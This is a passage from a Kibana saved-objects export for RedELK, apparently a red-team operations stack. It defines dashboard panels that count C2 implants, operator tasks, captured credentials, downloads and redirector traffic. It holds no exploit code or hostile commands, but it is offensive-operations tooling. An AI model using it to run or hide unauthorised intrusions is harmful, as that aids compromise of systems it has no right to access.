IP\"}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"infra.attack_scenario\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":5,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Scenario\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"top\",\"isDonut\":false,\"labels\":{\"show\":true,\"values\":true,\"last_level\":false,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Top new implants by ext IP address and scenario\"}"}, "coreMigrationVersion": "7.16.3", "id": "88003df0-b8ec-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642171875895, 154], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - TTP Cloud Tag", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"IDs\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"threat.technique.id\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other TTPs\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"TTP\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - TTP Cloud Tag\"}"}, "coreMigrationVersion": "7.16.3", "id": "88db1280-d024-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 156], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"c2.log.type: \\\"implant_newimplant\\\" AND (NOT tags: testsystems_V* )\",\"language\":\"lucene\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "title": "RedELK - Top users with new implants", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - Top users with new implants\",\"type\":\"pie\",\"params\":{\"type\":\"pie\",\"addTooltip\":false,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":true,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"size\":20,\"order\":\"desc\",\"orderBy\":\"1\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}]}"}, "coreMigrationVersion": "7.16.3", "id": "a1efc620-b8e4-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171875895, 158], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Tasks per host and user", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other users\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other hosts\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Tasks per host and user\"}"}, "coreMigrationVersion": "7.16.3", "id": "a5554e20-d025-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 160], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Credentials over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Credentials captured\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30d\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Credentials captured\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Credentials captured\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"bottom\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Credentials over time\"}"}, "coreMigrationVersion": "7.16.3", "id": "ab609c60-d319-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "search_0", "type": "search"}], "sort": [1642171875895, 162], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Techniques tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"signal.rule.threat.technique.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":300,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":14,\"maxFontSize\":58,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - MITRE ATT&CK Techniques tag cloud\"}"}, "coreMigrationVersion": "7.16.3", "id": "abdcd940-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 164], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Tasks per C2 operator", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Tasks launched\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-1d\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":true,\"missingBucketLabel\":\"Unknown user\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Tasks launched\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Tasks launched\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Tasks launched per operator\"}"}, "coreMigrationVersion": "7.16.3", "id": "afb6ce00-d022-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 166], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Hosts total unique count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"2\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"host.name\",\"customLabel\":\"Hosts\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Hosts total unique count\"}"}, "coreMigrationVersion": "7.16.3", "id": "b19d4790-d35f-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642171875895, 168], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Downloads total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Downloads\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - CS - Downloads total count\"}"}, "coreMigrationVersion": "7.16.3", "id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "search_0", "type": "search"}], "sort": [1642171875895, 170], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - HTTP Redir traffic over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - HTTP Redir traffic over time\",\"type\":\"line\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"filters\",\"params\":{\"filters\":[{\"input\":{\"query\":\"redir.backend.name : c2* and tags : \\\"iplist_customer\\\"\",\"language\":\"kuery\"},\"label\":\"C2 traffic - Customer\"},{\"input\":{\"query\":\"redir.backend.name : c2* and tags : \\\"iplist_redteam\\\" \",\"language\":\"kuery\"},\"label\":\"C2 traffic - Red team tests\"},{\"input\":{\"query\":\"redir.backend.name : c2* and not tags: \\\"iplist_customer\\\" and not tags : \\\"iplist_redteam\\\" \",\"language\":\"kuery\"},\"label\":\"C2 traffic - Other\"},{\"input\":{\"query\":\"not redir.backend.name : c2*\",\"language\":\"kuery\"},\"label\":\"Non-C2 traffic\"}]},\"schema\":\"group\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"date_histogram\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-1w\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}},\"schema\":\"segment\"}],\"params\":{\"type\":\"line\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"line\",\"mode\":\"normal\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"interpolate\":\"linear\",\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true,\"fittingFunction\":\"linear\"}}"}, "coreMigrationVersion": "7.16.3", "id": "be08d380-efe9-11eb-8a9f-2572da287875", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "name": "search_0", "type": "search"}], "sort": [1642171875895, 172], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - HTTP Redir traffic source table", "uiStateJSON": "{\"vis\":{\"params\":{\"sort\":{\"columnIndex\":null,\"direction\":null}}}}", "version": 1, "visState": "{\"title\":\"RedELK - HTTP Redir traffic source table\",\"type\":\"table\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{\"customLabel\":\"Hits\"},\"schema\":\"metric\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"source.ip\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Source IP\"},\"schema\":\"bucket\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"source.as.organization.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":1,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":true,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"AS Organisation\"},\"schema\":\"bucket\"},{\"id\":\"4\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"source.geo.country_iso_code\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":1,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":true,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Country\"},\"schema\":\"bucket\"}],\"params\":{\"perPage\":10,\"showPartialRows\":true,\"showMetricsAtAllLevels\":false,\"sort\":{\"columnIndex\":null,\"direction\":null},\"showTotal\":true,\"totalFunc\":\"sum\",\"percentageCol\":\"Hits\",\"showToolbar\":true}}"}, "coreMigrationVersion": "7.16.3", "id": "cbb7d710-efee-11eb-8a9f-2572da287875", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "name": "search_0", "type": "search"}], "sort": [1642171875895, 174], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Tasks execution timeframe", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"min\",\"schema\":\"metric\",\"params\":{\"field\":\"@timestamp\",\"customLabel\":\"First task\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"max\",\"schema\":\"metric\",\"params\":{\"field\":\"@timestamp\",\"customLabel\":\"Last task\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":24}}},\"title\":\"RedELK - Tasks execution timeframe\"}"}, "coreMigrationVersion": "7.16.3", "id": "ce581930-d361-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642171875895, 176], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "title": "RedELK - Target host and user selector", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"input_control_vis\",\"aggs\":[],\"params\":{\"controls\":[{\"id\":\"1595867425052\",\"fieldName\":\"host.name\",\"parent\":\"\",\"label\":\"Target host(s)\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_0_index_pattern\"},{\"id\":\"1595867451919\",\"fieldName\":\"user.name\",\"parent\":\"\",\"label\":\"Target user(s)\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_1_index_pattern\"}],\"updateFiltersOnChange\":true,\"useTimeFilter\":false,\"pinFilters\":false},\"title\":\"RedELK - Target host and user selector\"}"}, "coreMigrationVersion": "7.16.3", "id": "d2c7b720-d026-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "control_0_index_pattern", "type": "index-pattern"}, {"id": "rtops", "name": "control_1_index_pattern", "type": "index-pattern"}], "sort": [1642171875895, 179], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - HTTP Redir traffic per backend", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - HTTP Redir traffic per backend\",\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"filters\",\"params\":{\"filters\":[{\"input\":{\"query\":\"redir.backend.name : c2*\",\"language\":\"kuery\"},\"label\":\"C2 traffic\"},{\"input\":{\"query\":\"not redir.backend.name : c2*\",\"language\":\"kuery\"},\"label\":\"Non-C2 traffic\"}]},\"schema\":\"segment\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"redir.backend.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Backend\"},\"schema\":\"segment\"}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true}}"}, "coreMigrationVersion": "7.16.3", "id": "d625ba60-efe8-11eb-8a9f-2572da287875", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "name": "search_0", "type": "search"}], "sort": [1642171875895, 181], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Credentials total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Credentials\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Credentials total count\"}"}, "coreMigrationVersion": "7.16.3", "id": "dcf86190-d319-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "search_0", "type": "search"}], "sort": [1642171875895, 183], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"c2.log.type: implant_newimplant\",\"language\":\"lucene\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "title": "RedELK - New implants over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"New implants over time\",\"type\":\"line\",\"params\":{\"type\":\"line\",\"grid\":{\"categoryLines\":true,\"style\":{\"color\":\"#eee\"},\"valueAxis\":null},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"truncate\":100,\"rotate\":0,\"filter\":true},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Amount of implants\"}}],\"seriesParams\":[{\"show\":\"true\",\"type\":\"line\",\"mode\":\"stacked\",\"data\":{\"label\":\"Amount of implants\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"showCircles\":true,\"interpolate\":\"linear\",\"lineWidth\":5,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"top\",\"times\":[],\"addTimeMarker\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true,\"fittingFunction\":\"linear\"},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"interval\":\"auto\",\"min_doc_count\":1,\"extended_bounds\":{}}}]}"}, "coreMigrationVersion": "7.16.3", "id": "e12434d0-b8e8-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642171875895, 185], "type": "visualization", "version": "1"} +{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "title": "RedELK - Redirector Traffic All", "uiStateJSON": "{\"mapCenter\":[20.96143961409684,13.007096309476236],\"mapZoom\":2}", "version": 1, "visState": "{\"type\":\"tile_map\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Source IP\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"geohash_grid\",\"schema\":\"segment\",\"params\":{\"field\":\"source.geo.location\",\"autoPrecision\":true,\"precision\":2,\"useGeocentroid\":true,\"isFilteredByCollar\":true,\"customLabel\":\"\"}}],\"params\":{\"addTooltip\":true,\"colorSchema\":\"Blues\",\"heatClusterSize\":1.5,\"isDesaturated\":true,\"legendPosition\":\"bottomright\",\"mapCenter\":[0,0],\"mapType\":\"Heatmap\",\"mapZoom\":2,\"wms\":{\"baseLayersAreLoaded\":{},\"enabled\":false,\"options\":{\"format\":\"image/png\",\"transparent\":true},\"selectedTmsLayer\":{\"attribution\":\"

© OpenStreetMap contributors | Elastic Maps Service

